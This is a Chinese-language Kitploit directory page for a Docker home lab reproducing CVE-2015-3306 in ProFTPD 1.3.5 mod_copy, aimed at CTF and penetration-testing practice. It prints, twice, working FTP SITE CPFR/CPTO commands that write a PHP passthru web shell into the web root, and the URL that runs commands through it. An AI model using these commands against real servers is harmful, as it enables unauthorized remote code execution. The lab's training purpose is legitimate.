Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2015-3306-Home-Lab — CVE-2015-3306 - ProFTPD - RCE 家庭实验室搭建(Docker)易于用于红队或渗透测试 | Kitploit
工具/GitHubGitHub/netw0rk7/cve-2015-3306-home-lab
漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育红队实验室与实践
GitHubnetw0rk7/cve-2015-3306-home-lab

CVE-2015-3306-Home-Lab

CVE-2015-3306 - ProFTPD - RCE 家庭实验室搭建(Docker)易于用于红队或渗透测试

查看仓库
29个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

ProFTPD 1.3.5(mod_copy)—— RCE 模拟实验室

CVE20153306

此实验室旨在模拟漏洞 CVE-2015-3306 —— ProFTPD mod_copy 远程文件复制到 RCE
用于学习通过 ProFTPD 的 mod_copy 模块实现 Web Shell 注入 RCE。


功能特性

  • 存在漏洞的 ProFTPD 1.3.5
  • 完全启用 mod_copy(SITE CPFR / SITE CPTO)
  • 支持匿名 FTP
  • Apache2 + PHP5,用于模拟 web 根目录 /var/www/html
  • 攻击者可利用 SITE CPFR/CPTO 将文件复制到 webroot 以触发 RCE
  • 每次容器启动时自动生成 flag_RANDOM.txt
  • 适用于 CTF / 红队 / 渗透测试训练

目录结构

root@kitploit:~
/etc/proftpd/proftpd.conf /usr/local/proftpd/ /var/www/html/ /tmp/flag_xxx.txt /entrypoint.sh

使用方法(运行容器)

root@kitploit:~
docker build -t sentinel7-proftpd-lab .
docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab

测试 CVE-2015-3306 漏洞的方法

root@kitploit:~
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php

通过浏览器访问:

root@kitploit:~
http://<IP>/webshell.php?cmd=<command>

Flag

存储位置:

root@kitploit:~
/tmp/flag_RANDOM.txt

英文版本 —— ProFTPD 1.3.5(mod_copy)RCE 实验室

本实验室模拟 CVE-2015-3306,使用带 mod_copy 的 ProFTPD 1.3.5,允许攻击者执行 ProFTPD mod_copy 远程文件复制到 RCE。


功能特性

  • 从源码编译的存在漏洞的 ProFTPD 1.3.5
  • 启用 mod_copy(SITE CPFR + SITE CPTO)
  • 匿名 FTP 访问
  • Apache2 + PHP5 用于 webshell 执行
  • 容器启动时自动生成 flag_RANDOM.txt
  • 完美适用于 CTF、教育及漏洞研究

漏洞利用测试示例

root@kitploit:~
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>

SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php

然后执行:

root@kitploit:~
http://<IP>/webshell.php?cmd=<command>

Flag 位置

root@kitploit:~
/tmp/flag_RANDOM.txt

免责声明

仅供教育和授权的渗透测试使用。

下载工具